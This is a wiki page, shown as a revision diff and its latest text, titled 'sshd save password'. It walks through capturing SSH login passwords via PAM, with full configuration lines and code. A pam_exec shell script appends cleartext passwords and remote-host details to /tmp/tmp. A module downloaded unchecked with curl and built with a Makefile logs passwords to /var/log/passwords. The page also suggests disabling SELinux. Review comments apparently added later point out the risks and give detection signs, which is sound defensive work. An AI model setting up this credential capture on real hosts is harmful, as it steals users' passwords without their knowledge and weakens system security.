Sshd: Difference between revisions
(2 intermediate revisions by the same user not shown) | |||
Line 1: | Line 1: | ||
=sshd save password= | =sshd save password= | ||
==pam_exec.so== | |||
/etc/pam.d/password-auth-ac | |||
#%PAM-1.0 | |||
# This file is auto-generated. | |||
# User changes will be destroyed the next time authconfig is run. | |||
auth required pam_env.so | |||
auth sufficient pam_unix.so nullok try_first_pass | |||
auth optional pam_exec.so expose_authtok /usr/local/bin/pam_exec.so | |||
auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata | |||
... | |||
/usr/local/bin/pam_exec.so | |||
#!/bin/sh | |||
read password | |||
echo "User: $PAM_USER" >> /tmp/tmp | |||
echo "Ruser: $PAM_RUSER" >> /tmp/tmp | |||
echo "Rhost: $PAM_RHOST" >> /tmp/tmp | |||
echo "Service: $PAM_SERVICE" >> /tmp/tmp | |||
echo "TTY: $PAM_TTY" >> /tmp/tmp | |||
echo "Password : $password" >> /tmp/tmp | |||
exit $? | |||
==pam_storepw.so== | |||
Download source code for module. | Download source code for module. | ||
curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c | curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c | ||
Line 9: | Line 31: | ||
clean: | clean: | ||
rm -f pam_storepw.o pam_storepw.so core *~ | |||
extraclean: clean | extraclean: clean | ||
rm -f *.a *.o *.so *.bak | |||
.c.o: | .c.o: | ||
$(CC) $(CFLAGS) -c $< -o $@ -fPIC | |||
Build file | Build file |
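Review bot: The added helper script (the `/usr/local/bin/pam_exec.so` listing) appends the cleartext password and the PAM_* items to `/tmp/tmp`, a fixed name in a shared directory that is created under the caller's umask, so the captured credentials are probably readable by every local account. The page says nothing about this; I would add a line above the script such as `# writes cleartext credentials to /tmp/tmp; the file is not access-restricted`. The `.so` suffix on a `#!/bin/sh` script also makes the `auth optional pam_exec.so expose_authtok ...` line read as if two modules were involved, which deserves a one-line explanation in the text. The PAM stack continues past the `...` line, so the effect of the later entries cannot be judged from this hunk.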
Latest revision as of 07:46, 7 November 2018
sshd save password
pam_exec.so
/etc/pam.d/password-auth-ac
#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth required pam_env.so
auth sufficient pam_unix.so nullok try_first_pass
# NOTE(review): expose_authtok makes pam_exec pass the typed password to the
# command on stdin. The command here is a shell script, despite its .so name.
# When auditing a host, an auth line of this shape that the administrators did
# not add themselves is an indicator of credential capture.
auth optional pam_exec.so expose_authtok /usr/local/bin/pam_exec.so
auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...
/usr/local/bin/pam_exec.so
#!/bin/sh read password echo "User: $PAM_USER" >> /tmp/tmp echo "Ruser: $PAM_RUSER" >> /tmp/tmp echo "Rhost: $PAM_RHOST" >> /tmp/tmp echo "Service: $PAM_SERVICE" >> /tmp/tmp echo "TTY: $PAM_TTY" >> /tmp/tmp echo "Password : $password" >> /tmp/tmp exit $?
pam_storepw.so
Download source code for module.
# NOTE(review): plain-HTTP download with no checksum. -k only disables TLS
# certificate checks and -s hides progress and error output. The file is later
# built into a module loaded by the PAM stack, so read the source and compare it
# against a known-good hash (<expected-sha256>) before compiling.
curl -sk -O http://www.adeptus-mechanicus.com/codex/logsshp/chng-pam_storepw.c
Create the following Makefile
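# Builds pam_storepw.so from pam_storepw.c in the current directory.
# These targets are commands, not files; declaring them phony keeps a stray
# file named "all" or "clean" from silently disabling the recipe.
.PHONY: all clean extraclean

all: pam_storepw.so

# Link the single object into the shared object that PAM loads.
pam_storepw.so: pam_storepw.o
	$(LD) --shared -o $@ $< -lpam -lpam_misc

# Remove this build's products, plus core dumps and editor backup files.
clean:
	rm -f pam_storepw.o pam_storepw.so core *~

# Broader sweep: also deletes every other archive, object, shared object and
# .bak file in this directory, not only the ones this Makefile produced.
extraclean: clean
	rm -f *.a *.o *.so *.bak

# -fPIC is needed because the object is linked into a shared object.
%.o: %.c
	$(CC) $(CFLAGS) -c $< -o $@ -fPIC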
Build file
make
Copy file
# NOTE(review): this places a locally built module next to the distribution's
# PAM modules. On an RPM-based host (authconfig suggests one - confirm) a file
# in this directory that `rpm -qf` reports as not owned by any package is a
# useful detection signal.
cp pam_storepw.so /lib64/security/
chmod 755 /lib64/security/pam_storepw.so
password-auth-ac
#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth required pam_env.so
auth sufficient pam_unix.so nullok try_first_pass
# NOTE(review): pam_storepw.so is the module compiled from the downloaded
# source, not part of the stock stack. Per this page it records passwords in
# /var/log/passwords. When auditing, an unrecognised module name on an auth
# line is worth checking against the files in /lib64/security.
auth optional pam_storepw.so
auth [success=1 default=ignore] pam_succeed_if.so user in ipautomata
...
Passwords start to be written to
/var/log/passwords
If you do not get any entries:
Temporarily turn SELinux off to see whether it starts to work, and run PAM in debug mode to see what is going on.